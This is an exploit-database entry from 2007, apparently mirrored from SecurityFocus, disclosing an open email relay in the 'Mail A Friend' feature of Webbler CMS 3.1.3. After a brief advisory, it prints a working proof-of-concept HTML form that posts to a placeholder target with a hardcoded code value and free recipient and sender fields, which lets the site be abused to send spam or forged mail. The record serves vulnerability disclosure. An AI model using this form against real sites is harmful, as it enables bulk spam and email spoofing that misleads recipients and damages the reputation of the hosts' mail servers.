Webbler CMS 3.1.3 - Mail A Friend Open Email Relay

Type exploitpack
Reporter Adrian Pastor
Modified 2007-07-24T00:00:00


Webbler CMS 3.1.3 - Mail A Friend Open Email Relay

                                            source: https://www.securityfocus.com/bid/25045/info

The 'webbler' is prone to an open-email-relay vulnerability.

An attacker may leverage the issue to use webservers that are hosting the vulnerable software to send arbitrary unsolicited bulk email. Attackers may also forge email messages that originate from trusted mail servers.

This issue affects webbler 3.1.3; prior versions may also be affected. 

 <form method="post" action="http://www.target-domain.com/?lid=12506">
        <input type="hidden" name="code" value="4672577a2d323">
        <input type="hidden" name="referral_uri" value="">
        <input type="hidden" name="document_title" value="">
        <input type="text" name="recipient" value="">
        <input type="text" name="username" value="">
        <input type="text" name="useremail" value="">
        <INPUT class="sendbutton" type=submit name=sa VALUE="send page">